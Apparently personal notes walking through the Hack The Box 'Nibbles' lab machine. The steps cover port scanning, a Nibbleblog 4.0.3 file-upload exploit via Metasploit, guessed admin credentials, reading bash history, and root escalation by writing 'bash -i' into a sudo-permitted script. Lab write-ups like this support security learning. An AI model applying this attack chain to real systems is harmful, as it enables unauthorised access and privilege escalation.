HTB 6. Nibbles
- 1.Port 22 and 80 open from
nmap -A -T4 -p- 10.10.10.75, typically 80 is for the exploit and 22 is used later. SSH is usually not the exploit.
searchsploit apache 2.4
- 3.Going to
10.10.10.75shows "Hello World" only
- 4.Viewing source shows
10.10.10.75/nibbleblog/on nibbleblog platform
searchsploit nibblefinds Nibbleblog 4.0.3 arbitrary file upload and remote code execution
- 6.In metasploit
infoshows we need to be authenticated
dirbusterto find login pages
- 8.Could potentially use Burp Suite to brute force usernames and password or just bruteforce password with admin as username. Potentially use
cewlon blog posts to create password list.
- 9.Credentials are
admin:nibbles, guessed by site name.
- 10.Set parameters in metasploit to the username, password, rhosts, and
- 11.This works because of the
My Imageplugin that allows any file to be uploaded (no whitelisting is being done)
- 13.Searching for priv_escshellcd /home/nibblerls -lacat user.txthistorycat .bash_historysudo -l
~/personal/stuff/monitor.shcan run as root without a password
- 15.This folder does not exist so we can create a shell script in that location.
personal.zipexists, potentially try and crack it
uname -ato print entire OS running and potentially search for exploits for the general OS
echo "bash -i" > monitor.shand
chmod +x monitor.sh